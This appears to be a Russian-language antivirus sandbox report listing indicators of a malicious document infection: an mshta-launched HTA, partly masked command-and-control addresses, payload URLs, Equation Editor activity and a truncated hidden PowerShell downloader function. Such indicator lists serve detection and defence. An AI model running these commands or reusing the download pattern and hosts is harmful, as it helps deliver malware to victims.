Техническая информация
- '%WINDIR%\syswow64\mshta.exe' "%APPDATA%\driodmonday.hta"
- %APPDATA%\driodmonday.hta
- '17#.#45.214.91':80
- 'up#####eimagens.com.br':443
- '45.#4.19.84':80
- http://17#.#45.214.91/htamicrosoftredesignbuddyupdationchildprocessthroughballonupdationprocess.doC
- http://17#.#45.214.91/droidmonday.hta
- http://45.#4.19.84/xampp/bkp/bkp_hta.jpg
- 'up#####eimagens.com.br':443
- DNS ASK up#####eimagens.com.br
- ClassName: 'HTML Application Host Window Class' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach (...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach (...